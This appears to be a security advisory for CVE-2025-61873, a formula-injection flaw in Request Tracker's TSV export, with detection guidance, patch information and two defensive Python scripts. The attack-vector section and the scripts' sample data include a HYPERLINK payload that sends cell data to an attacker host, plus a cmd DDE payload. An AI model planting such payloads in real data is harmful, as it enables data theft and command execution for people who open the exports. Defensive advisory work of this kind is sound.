CVE-2025-61873 Overview
CVE-2025-61873 is a CSV Injection vulnerability affecting Best Practical Request Tracker (RT), a widely-used open-source ticket tracking system. The vulnerability allows attackers to inject malicious formulas into ticket values that are executed when TSV (Tab-Separated Values) exports are opened in spreadsheet applications like Microsoft Excel or LibreOffice Calc.
CSV Injection, also known as Formula Injection (CWE-1236), occurs when untrusted data is embedded into CSV or TSV files without proper sanitization. When these exported files are opened in spreadsheet applications, any cells beginning with special characters like =, +, -, or @ may be interpreted as formulas and executed, potentially leading to data exfiltration or command execution on the user's system.
Critical Impact
Attackers can craft malicious ticket values that execute arbitrary formulas when exported TSV data is opened in spreadsheet applications, potentially compromising the security of users who process exported ticket data.
Affected Products
- Best Practical Request Tracker (RT) 4.x series: versions before 4.4.9
- Best Practical Request Tracker (RT) 5.0.x series: versions before 5.0.9
- Best Practical Request Tracker (RT) 6.x series: versions before 6.0.2
Discovery Timeline
- 2026-01-16 - CVE-2025-61873 published to NVD
- 2026-01-16 - Last updated in NVD database
Technical Details for CVE-2025-61873
Vulnerability Analysis
This vulnerability falls under CWE-1236 (Improper Neutralization of Formula Elements in a CSV File), commonly referred to as CSV Injection or Formula Injection. The core issue lies in how Request Tracker handles user-supplied ticket data during the TSV export process.
When users export ticket data as TSV files, the application fails to properly sanitize or escape values that could be interpreted as spreadsheet formulas. An attacker with the ability to create or modify ticket values can inject payloads that will execute when an administrator or user opens the exported file in a spreadsheet application.
The attack requires several conditions to be met: the attacker must have permissions to create or modify ticket content, a victim must export ticket data as TSV, and the victim must open the exported file in a vulnerable spreadsheet application with formula execution enabled.
Root Cause
The root cause of this vulnerability is insufficient input validation and output encoding in the TSV export functionality of Request Tracker. When ticket data is exported, the application does not sanitize or prefix potentially dangerous characters (=, +, -, @, \t, \r) that spreadsheet applications interpret as formula indicators.
Proper mitigation requires either prefixing potentially dangerous values with a single quote (') or escaping special characters to prevent formula interpretation by spreadsheet applications.
Attack Vector
The attack is network-based and requires high privileges (ability to modify ticket data) along with user interaction (victim must export and open the file). The attack scenario typically unfolds as follows:
- An attacker creates a ticket or modifies an existing ticket's fields with a malicious payload such as =HYPERLINK("http://attacker.com/steal?data="&A1,"Click Here") or =cmd|'/C calc'!A0
- An administrator or user with export privileges generates a TSV export that includes the malicious ticket data
- The victim opens the exported TSV file in a spreadsheet application
- The spreadsheet application interprets and potentially executes the injected formula
The vulnerability has a changed scope, meaning successful exploitation can impact resources beyond the vulnerable component itself, potentially affecting the user's local system.
Detection Methods for CVE-2025-61873
Indicators of Compromise
- Ticket content containing formula-like strings beginning with =, +, -, or @ characters
- Unusual ticket submissions with embedded hyperlinks or external references in formula syntax
- Audit logs showing ticket modifications with suspicious character patterns
Detection Strategies
- Implement content scanning rules to detect formula injection patterns in ticket submissions
- Monitor for ticket values containing common injection patterns like =HYPERLINK, =CMD, or =IMPORTDATA
- Review exported TSV files for unexpected formula content before opening in spreadsheet applications
Monitoring Recommendations
- Enable detailed audit logging for ticket creation and modification events
- Monitor for bulk ticket exports by users and correlate with potentially suspicious ticket content
- Implement alerts for ticket content matching known CSV injection patterns
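The content-scanning rules described above can be sketched as follows. This is an added example, not Request Tracker code or a vendor rule set; the record layout and field names are hypothetical and the sample records are constructed. It separates named-function matches from values that merely start with a trigger character, and it skips signed numbers and phone numbers to reduce false positives.

```python
import re

# Function names taken from the Detection Strategies list above.
HIGH_RISK = re.compile(r"^\s*[=+\-@]\s*(HYPERLINK|CMD|IMPORTDATA)\b", re.I)
# Any value whose first non-space character is a formula indicator.
LEADING_TRIGGER = re.compile(r"^ *[=+\-@\t\r]")
# Signed numbers and phone numbers start with + or - but carry no formula.
BENIGN_NUMBER = re.compile(r"^\s*[+\-]\s*[\d(][\d\s().,\-]*$")

# Constructed audit records (hypothetical field names, not RT's log schema).
SAMPLE_EVENTS = [
    {"ticket": 101, "field": "Subject", "value": "Printer offline"},
    {"ticket": 102, "field": "Subject",
     "value": '=HYPERLINK("http://attacker.com/steal?data="&A1,"Click Here")'},
    {"ticket": 103, "field": "CF.Phone", "value": "+1 (555) 010-0199"},
    {"ticket": 104, "field": "Subject", "value": "-5 degrees in server room"},
    {"ticket": 105, "field": "Subject", "value": "@oncall please look"},
    {"ticket": 106, "field": "Content", "value": "  =importdata(A1)"},
]


def classify(value):
    """Return 'high', 'review', or None for one ticket field value."""
    if HIGH_RISK.match(value):
        return "high"
    if LEADING_TRIGGER.match(value) and not BENIGN_NUMBER.match(value):
        return "review"
    return None


def scan(events):
    """Return (ticket, field, severity) for every flagged record."""
    findings = []
    for event in events:
        severity = classify(event["value"])
        if severity:
            findings.append((event["ticket"], event["field"], severity))
    return findings


if __name__ == "__main__":
    for ticket, field, severity in scan(SAMPLE_EVENTS):
        print(f"ticket={ticket} field={field} severity={severity}")
```

Values in the "review" tier, such as a subject line starting with "@", are usually legitimate, so they suit a periodic report rather than a paging alert.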
How to Mitigate CVE-2025-61873
Immediate Actions Required
- Upgrade Request Tracker to version 4.4.9, 5.0.9, or 6.0.2 or later depending on your installed branch
- Review existing tickets for potentially malicious content containing formula injection patterns
- Educate users about the risks of opening exported TSV/CSV files and enabling formula execution
Patch Information
Best Practical has released patched versions to address this vulnerability. Organizations should upgrade to the following versions:
- For RT 4.x series: Upgrade to version 4.4.9 or later
- For RT 5.0.x series: Upgrade to version 5.0.9 or later
- For RT 6.x series: Upgrade to version 6.0.2 or later
Detailed release information is available in the Best Practical Release Notes.
Workarounds
- Configure spreadsheet applications to disable automatic formula execution when opening external files
- Pre-process exported TSV files through a sanitization script before opening in spreadsheet applications
- Restrict TSV export functionality to trusted administrators only until patches can be applied
- Use CSV/TSV viewers that do not interpret formulas instead of full spreadsheet applications
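A pre-processing script for the sanitization workaround above could look like the following. This is an added example, not part of the vendor patch or of Request Tracker; it assumes a tab-delimited export with optional double-quote quoting, uses a placeholder file name, and runs on a constructed sample. It applies the single-quote prefix described under Root Cause to every cell that starts with one of the listed indicator characters.

```python
import csv
import io
import sys

# Leading characters listed in the Root Cause section as formula indicators.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export (not real RT output). Row 2 reuses a payload
# quoted on this page; row 4 hides a formula inside a quoted field.
SAMPLE_EXPORT = (
    "id\tSubject\tRequestor\n"
    "1\tPrinter offline\talice@example.com\n"
    '2\t=HYPERLINK("http://attacker.com/steal?data="&A1,"Click Here")\tbob@example.com\n'
    "3\t  +1+1\tcarol@example.com\n"
    '4\t"=1+1"\t-5\n'
)


def neutralize_cell(value: str) -> str:
    """Prefix a single quote so the cell is read as text, not a formula."""
    # Leading spaces are skipped first so they cannot hide the trigger.
    if value.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def sanitize_tsv(text: str) -> str:
    """Return the TSV text with every formula-like cell neutralized."""
    # Assumption: tab-delimited, with optional double-quote quoting.
    # Parsing first means a quoted field such as "=1+1" is checked on its
    # real content rather than on the quote character.
    reader = csv.reader(io.StringIO(text, newline=""), delimiter="\t")
    out = io.StringIO(newline="")
    writer = csv.writer(out, delimiter="\t", lineterminator="\n")
    for row in reader:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()


if __name__ == "__main__":
    # Usage: python sanitize_tsv.py export.tsv > export.safe.tsv
    if len(sys.argv) > 1:
        with open(sys.argv[1], newline="", encoding="utf-8") as fh:
            sys.stdout.write(sanitize_tsv(fh.read()))
    else:
        sys.stdout.write(sanitize_tsv(SAMPLE_EXPORT))
```

Legitimate values such as negative numbers are also stored as text after this step, which is the trade-off for treating every leading indicator character as untrusted.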

